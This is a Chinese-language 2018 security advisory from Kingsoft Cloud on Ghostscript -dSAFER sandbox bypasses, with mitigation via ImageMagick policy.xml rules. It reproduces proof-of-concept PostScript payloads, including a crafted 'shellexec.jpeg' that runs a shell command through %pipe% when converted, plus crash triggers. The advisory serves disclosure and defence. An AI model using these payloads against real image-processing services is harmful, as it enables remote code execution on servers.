2018年8月22日,金山云安全應(yīng)急響應(yīng)中心監(jiān)控到外界安全研究員Tavis Ormandy公布了與Ghostscript漏洞有關(guān)的細(xì)節(jié)信息��,這些漏洞若被利用�,可導(dǎo)致遠(yuǎn)程代碼執(zhí)行。
漏洞編號
還未分配漏洞編號
漏洞名稱
Ghostscript 遠(yuǎn)程代碼執(zhí)行
漏洞危害等級
高危
漏洞描述
攻擊者可利用惡意PostScript�、PDF、EPS或XPS文件觸發(fā)漏洞����,以下為漏洞簡介:
1./invalidaccess 恢復(fù)失敗后會結(jié)束,可控制錯誤處理部分
$ *gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null*GS>*legal*GS>*{ null restore } stopped { pop } if*GS>*legal*GS>*mark /OutputFile (%pipe%id) currentdevice putdeviceprops*GS<1>*showpage*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
2.setcolor可通過setpattern間接調(diào)用且未進(jìn)行檢查
$ *gs -q -sDEVICE=ppmraw -dSAFER*GS>*<< /Whatever 16#414141414141 >> setpattern*Segmentation fault
3.LockDistillerParams布爾值未進(jìn)行類型檢查
$ *gs -q -sDEVICE=ppmraw -dSAFER*GS>*<< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams*Segmentation fault
4. .tempfile權(quán)限管理未生效
Ubuntu:
$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undefsave
legal
{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
CentOS:
$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undeflegal
{ null restore } stopped { pop } iflegal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
影響版本
截止目前���,Artifex Software���,ImageMagick,Redhat�����,Ubuntu已經(jīng)說明會受到此漏洞影響,CoreOS宣布不受影響��。
修復(fù)方案
1. 目前官方還未發(fā)布補(bǔ)丁��,請關(guān)注補(bǔ)丁更新信息并進(jìn)行修復(fù)工作�。
2. CERT/CC發(fā)布安全通告,對此漏洞進(jìn)行預(yù)警�����,其中漏洞描述為“-dSAFER沙箱繞過漏洞”�����,給出的臨時解決方案是在ImageMagick policy.xml中禁用PostScript��、EPS����、PDF以及XPS解碼器。
<policy domain =“coder”rights =“none”pattern =“PS”/> <policy domain =“coder”rights =“none”pattern =“EPS”/> <policy domain =“coder”rights =“none” pattern =“PDF”/> <policy domain =“coder”rights =“none”pattern =“XPS”/>
北京金山云網(wǎng)絡(luò)技術(shù)有限公司
2018/08/22